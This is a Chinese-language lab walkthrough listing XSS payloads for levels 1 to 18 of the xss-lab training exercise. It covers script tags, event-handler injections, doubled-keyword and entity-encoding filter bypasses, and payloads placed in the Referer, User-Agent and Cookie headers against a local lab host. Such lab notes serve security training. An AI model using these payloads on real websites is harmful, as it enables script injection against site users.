xss-lab 1-18关payload

Less-1

?name=<script>alert()</script>

Less-2

"><script>alert()</script>

"οnclick="alert()

" οnfοcus="alert()

" οnblur="alert()

Less-3

' οnfοcus='alert()

' οnblur='alert()

' οnfοcus='javascript:alert()'

' οnblur='javascript:alert()

' οnclick='alert()

Less-4

" οnfοcus="alert()

" οnfοcus="javascript:alert()

" οnblur="alert()

" οnblur="javascript:alert()

" οnclick="alert()

" οnclick="javascript:alert()

Less-5

"><a href="javascript:alert();">cooper</a>

Less-6

" Onclick="alert()

" Onfocus="alert()

" Onblur = "alert()

"><a Href="javascript:alert()">cooper</a>

"><Script>alert()</Script>

Less-7

" oonnfocus="alert()

"oonnclick="alert()

" oonnfocus="alert()

"><a hhrefref="javasscriptcript:alert()">cooper</a>

"><sscriptcript>alert()</sscriptcript>

"><img ssrcrc=666 oonnerror=alert()>

"><img srsrcc=666 oonnmouseout=alert()>

"><img srsrcc=666 oonnmouseover=alert()>

Less-8

javascript:alert() (使用Unicode编码)

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

Less-9

javascript:alert() 编码后加http://,注释使用//或/**/

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;//http://

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/*http://*/

Less-10

?t_sort=" οnfοcus=javascript:alert(); type="text type(加窗口)

?t_sort=" οnclick=javascript:alert(); type="

?t_sort=" οnblur=javascript:alert(); type="

?keyword=well done!&t_lick=aa&t_history=aa&t_sort=aa 查看哪里可以赋值

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnclick='alert(123)'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnblur='javascript:alert()'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnfοcus='alert(123)'

Less-11

使用burpsuite抓包

在Referer处改为Less-10的payload,放行即可

Referer:" οnfοcus=javascript:alert(); type="text

Less-12

使用burpsuite抓包

在UA处改为Less-10的payload,放行即可

User-Agent: " οnfοcus=javascript:alert(); type="text

Less-13

使用burpsuite抓包

在cookie处改为Less-10的payload,放行即可

Cookie: user=" οnfοcus=javascript:alert() type="text

Less-14

网页失效,上传图片属性中含有js代码,详见博客

Less-15

http://192.168.31.110/xss/level15.php?src=' http://192.168.31.110/xss/level1.php?name="><a href="javascript:alert( )">cooper</a>'

Less-16

http://192.168.31.110/xss/level16.php?keyword=<a href='javasc ript:alert()'>cooper

Less-17

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b οnmοuseοver=javascript:alert()

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b οnmοuseοut=javascript:alert()

(在edge上打开,火狐没有弹窗)

Less-18

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseοver=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseοut=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseleave=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseenter=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοusedοwn=alert() (点击触发)

onmouseover、onmouseout:鼠标移动到自身时候会触发事件,同时移动到其子元素身上也会触发事件

onmouseenter、onmouseleave:鼠标移动到自身是会触发事件,但是移动到其子元素身上不会触发事件

相关推荐
胡西风_foxww6 分钟前
【es6复习笔记】rest参数(7)
前端·笔记·es6·参数·rest
m0_748254887 分钟前
vue+elementui实现下拉表格多选+搜索+分页+回显+全选2.0
前端·vue.js·elementui
星就前端叭1 小时前
【开源】一款基于Vue3 + WebRTC + Node + SRS + FFmpeg搭建的直播间项目
前端·后端·开源·webrtc
m0_748234521 小时前
前端Vue3字体优化三部曲(webFont、font-spider、spa-font-spider-webpack-plugin)
前端·webpack·node.js
Web阿成1 小时前
3.学习webpack配置 尝试打包ts文件
前端·学习·webpack·typescript
噢,我明白了1 小时前
同源策略:为什么XMLHttpRequest不能跨域请求资源?
javascript·跨域
sanguine__2 小时前
APIs-day2
javascript·css·css3
jwensh2 小时前
【Jenkins】Declarative和Scripted两种脚本模式有什么具体的区别
运维·前端·jenkins
关你西红柿子2 小时前
小程序app封装公用顶部筛选区uv-drop-down
前端·javascript·vue.js·小程序·uv
益达是我2 小时前
【Chrome】浏览器提示警告Chrome is moving towards a new experience
前端·chrome